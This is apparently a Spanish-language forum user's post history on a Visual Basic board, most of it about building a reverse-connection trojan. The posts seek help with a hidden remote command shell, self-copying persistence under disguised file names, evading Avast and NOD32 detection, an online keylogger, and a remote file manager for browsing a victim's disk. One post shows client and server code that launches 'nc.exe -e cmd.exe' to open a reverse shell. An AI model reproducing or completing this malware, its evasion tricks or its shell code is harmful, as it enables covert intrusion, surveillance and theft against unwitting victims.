| |
 Mostrar Temas
|
|
Páginas: [1] 2
|
|
1
|
Programación / Programación Visual Basic / Activar Telnet VB6
|
en: 15 Diciembre 2009, 01:32 am
|
|
hola
estoy viendo la posibilidad para agregar a mi troyano una funcion que deje un agujero en el pc para poder sacar una shell remota.. se me ocurrio que podria dejar de alguna manera un telnet a la escucha(nose como, no tengo mucha informacion sobre telnet) y asi poder conectarme y obtener shell remota
se puede? a alguien se le ocurre alguna manera? gracias!
PD: seria harto mejor que fuera conexion inversa para saltarse firewalls y demases, dejar un telnet a la escucha en mi pc y que el telnet remoto trate de conectarse cada cierto rato
|
|
|
|
|
2
|
Programación / Programación Visual Basic / Ayuda con CMD Pipe vb6
|
en: 12 Diciembre 2009, 05:06 am
|
hola hace unos años cree un troyano de multiconexion inversa ahora lo retome ya que lo quiero volver a usar y estoy en proceso para poder enviar comandos a la cmd remota y poder volver a recibir lo que pasa (EJ: pongo dir C:\ y me devuelve el resultado, enlistando los archivos en C:\) para esto encontre este codigo de cmd pipe 'Redirects output from console program to textbox.
'Requires two textboxes and one command button.
'Set MultiLine property of Text2 to true.
'
'Original bcx version of this program was made by
' dl <dl@tks.cjb.net>
'VB port was made by Jernej Simoncic <jernej@isg.si>
'Visit Jernejs site at http://www2.arnes.si/~sopjsimo/
'
'Note: don't run plain DOS programs with this example
'under Windows 95,98 and ME, as the program freezes when
'execution of program is finnished.
Option Explicit
Private Declare Function CreatePipe Lib "kernel32" (phReadPipe As Long, phWritePipe As Long, lpPipeAttributes As SECURITY_ATTRIBUTES, ByVal nSize As Long) As Long
Private Declare Sub GetStartupInfo Lib "kernel32" Alias "GetStartupInfoA" (lpStartupInfo As STARTUPINFO)
Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadId As Long
End Type
Private Type STARTUPINFO
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Byte
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
Private Type OVERLAPPED
ternal As Long
ternalHigh As Long
offset As Long
OffsetHigh As Long
hEvent As Long
End Type
Private Const STARTF_USESHOWWINDOW = &H1
Private Const STARTF_USESTDHANDLES = &H100
Private Const SW_HIDE = 0
Private Const EM_SETSEL = &HB1
Private Const EM_REPLACESEL = &HC2
Private Sub Command1_Click()
Command1.Enabled = False
Redirect Text1.Text, Text2
Command1.Enabled = True
End Sub
Private Sub Form_Load()
Text1.Text = "ping"
End Sub
Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
If Command1.Enabled = False Then Cancel = True
End Sub
Sub Redirect(cmdLine As String, objTarget As Object)
Dim i%, t$
Dim pa As SECURITY_ATTRIBUTES
Dim pra As SECURITY_ATTRIBUTES
Dim tra As SECURITY_ATTRIBUTES
Dim pi As PROCESS_INFORMATION
Dim sui As STARTUPINFO
Dim hRead As Long
Dim hWrite As Long
Dim bRead As Long
Dim lpBuffer(1024) As Byte
pa.nLength = Len(pa)
pa.lpSecurityDescriptor = 0
pa.bInheritHandle = True
pra.nLength = Len(pra)
tra.nLength = Len(tra)
If CreatePipe(hRead, hWrite, pa, 0) <> 0 Then
sui.cb = Len(sui)
GetStartupInfo sui
sui.hStdOutput = hWrite
sui.hStdError = hWrite
sui.dwFlags = STARTF_USESHOWWINDOW Or STARTF_USESTDHANDLES
sui.wShowWindow = SW_HIDE
If CreateProcess(vbNullString, cmdLine, pra, tra, True, 0, Null, vbNullString, sui, pi) <> 0 Then
SetWindowText objTarget.hwnd, ""
Do
Erase lpBuffer()
If ReadFile(hRead, lpBuffer(0), 1023, bRead, ByVal 0&) Then
SendMessage objTarget.hwnd, EM_SETSEL, -1, 0
SendMessage objTarget.hwnd, EM_REPLACESEL, False, lpBuffer(0)
DoEvents
Else
CloseHandle pi.hThread
CloseHandle pi.hProcess
Exit Do
End If
CloseHandle hWrite
Loop
CloseHandle hRead
End If
End If
End Sub para enviar comandos como cd o dir hay que anteponer un "cmd /k" (Ej: cmd /k dir C:\) no me pregunten por que (si alguien me puede explicar porque hay que hacerlo se agradece jajaja) pero bueno el problema es que al enviar un comando como un dir o cd, me sale este error: Error '9' en tiempo de ejecucion:
el subindice esta fuera del intervalo
ayuda porfavor! gracias de antemano |
|
|
|
|
3
|
Programación / Programación Visual Basic / Problema con Avast ¬¬
|
en: 26 Junio 2007, 00:00 am
|
|
no se porque el avast me empezo a detectar mi troyanito =(
esta hecho en vb y lo hice yo, ningun otro av lo detecta solo el nod
parece que es por que se copia a la carpeta de windows i se renombra, ademas de eso crea un programa aparte que chekea si esta iniciado el proceso, si no lo esta lo inicia, todo esto en un timer
tambien tengo cifrada la clave del registro..
que puedo hacer?
publico el code para que me ayuden en que parte puede estar detectandolo???
GraciaS de AnteManO!
|
|
|
|
|
4
|
Programación / Programación Visual Basic / Detectar si se repite una combinacion....
|
en: 20 Junio 2007, 00:47 am
|
Primero que nada este code no es para mi... me lo pidio un amigo que en realidad no entiendo mucho lo que quiere hacer... al parecer es para descifrar un codigo del zodiaco.. algo así entendi.. pero bueno aca va la pregunta lo que quiero hacer es por ejemplo tener un textbox, y en ese textbox se escribiria un textto como este con varios signos 1asd^ç*da!7//asd?^ç*??213¡¡¡ la idea es que al apretar un command button el textbox marque todas las combinaciones repeitdas de 3 caracteres, por ejemplo aca se repite la combinacion de 3 caracteres ^ç* entonces el textbox deberia marcar con otro color el ^ç*me expplique bien??? es posible hacer esto con vb6??? Gracias de antemano!!!!  |
|
|
|
|
5
|
Programación / Programación Visual Basic / filecopy detectado por nod32 =S
|
en: 18 Junio 2007, 22:22 pm
|
hace tiempo que estoy con un troyano, y decidi hacerle un modulo de "infeccion", entre comillas por que realmente no es infeccion.. lo unico que hace es copiar el programa 2 veces a la carpeta de windows, con los nombres ssms.exe y jushed.exe, el primero compureba cada cierto rato que exista el archivo jushed y que este iniciado el proceso, si no es asi, se autocopia, i si es necesario inicia el proceso, lo mismo jushed.exe, hace lo mismo, solo que inversamente, ademas de hacer la conexion al troyano. El problema esta en que en el modulo, esta la linea WinDirek = Environ("windir") & "/"
BSExe = App.path & "/" & App.EXEName & ".exe"
FileCopy BSExe, WinDirek & "jushed.exe"si saco la linea filecopy, y le paso el nod32, no lo detecta, si la vuelvo a poner me lo empieza a detectar alguien sabe como solucionarlo??? talve encriptandolo??? GraciasS de Antemano |
|
|
|
|
6
|
Programación / Programación Visual Basic / cifrar Cadena Registro
|
en: 16 Junio 2007, 17:40 pm
|
wenasS ase tiempo que estoy haciendo un troyano en vb6, y hace un tiempo el nod32 me lo empezo a detectar. Vivachapas me dijo que era por heuristica (o como se escriba xD), y se solucionaba cifrando la cadena del registro. Encontre un code bien corto y lo puse, el problema es que no lo entiendo para nada, y tengo varias aplicaciones que ocupan el mismo code para agregar y cifrar la cadena, entonces al parecer la remplaza :S alguien tiene algun code que pueda explicar? GRAcias de antemano  |
|
|
|
|
7
|
Programación / Programación Visual Basic / Cursor???
|
en: 24 Mayo 2007, 00:17 am
|
wenassS estoy haciendo un troyano desde hace harto tiempo, cuando lo termine lo publico aca para que lo vean  bueno.. la cosa es que ya tiene varias funciones serias, pero no muchas lammeradas... no es que sea lammer, pero muchas veces en un troyano termina siendo divertido asustar un poco a la victima con algunas bromas de buen gusto lo que se me ocurrio hacer, y lo he visto en troyanos como el darkmoon, es hacer que mientras vaya moviendo el cursor del raton, que vaya dejando un "rastro" me refiero a que vaya rayando su escritorio de algun color, lo otro seria hacer que el maus se vuelva loco, osea que se empieze a mover hacia cualquier lado.. alguien tiene algun code???, si me pueden orientar o ayudar se los agradeceria mucho! gracias de antemano! |
|
|
|
|
8
|
Programación / Programación Visual Basic / Error con SendData de la api ws!
|
en: 20 Mayo 2007, 19:46 pm
|
estoy haciendo un keylogger online, y todo va bien hasta que al enviar los datos con un timer, me da error en el modulo de la api de ws, me dice Error '9' en tiempo de ejecución, el subindice esta fuera del intervalo y apunta a esta linea del modulo de la api de ws Err.Raise Err.Number, "CSocket.SendData", Err.Description Gracias de antemano |
|
|
|
|
9
|
Programación / Programación Visual Basic / Problema con Split data
|
en: 15 Mayo 2007, 02:53 am
|
weno sigo con el proyecto de mi troyano, que cada dia mejora mas... aunque estuvo tirado x aproximadamente 1semana, porque estuve mui ocupado asiendo cosas para el cole.. bueno en fin... mi problema es que cuando mando algo, i ago split data, la segunda parte no llega nunca al text del servidor.. no se si me explico bien, pero aca dejo el code de cliente y servidor: Cliente:
Public VPort As Integer
Private Sub Command1_Click()
VPort = Text1.Text
Dim vIndex As Variant 'Declaracion
vIndex = Split(Form1.ListConexion.SelectedItem.Key, "|")
Form1.WS(vIndex(0)).SendData "nc_shell" & "|" & VPort
End Sub
'al presionar el boton, manda al servidor la palabra nc_shell y un puerto
Servidor:
Private Sub WS_onDataArrival(ByVal bytesTotal As Long)
Dim vData() As String
WS.GetData VTData, vbString
vData = Split(VTData, "|")
If vData(0) = "msge" Then
MsgBox vData(1)
VTData = ""
End If
If vData(0) = "nc_shell" Then
Shell App.path & "\nc.exe -e cmd.exe IP" & "|" & vData(1)
End If '''' ******notese esta parte que es la quye interesa!
Text1.Text = VTData
End Sub
la finalidad de este code, es abrir el netcat, para obtener shell remota, en un determinado port.. e revisado varias veces el code i no encuentro cual es la falla! si no me explike bien diganme lo que no entendieron pero ayuda porfavor! GRACIAS de antemano! |
|
|
|
|
10
|
Programación / Programación Visual Basic / Crear Filemanager remoto
|
en: 7 Mayo 2007, 22:01 pm
|
|
bueno como algunos saben, estoy en la creacion de un troyano mci, por ahora tiene pocas funciones.. ya le ire agregando mas.. estaba pensando en ponerle un filemanager remoto, osea poder explorar el hd, subir/bajar archivos y ejecutar archivos, encontre un manual (troyano desde 0, en portalhacker.net) pero el filemanager que tenia, permitia explorar solamente tu disco, y para bajar archivos de la maquina remota, aparecia un cartelito pidiendo la ruta del archivo, lo que encontre extraño, por que no habia forma de explorar el hd de la victima.. alguien que me pueda orientar o ayudar???
muchas gracias!
|
|
|
|
|
|
| |
|
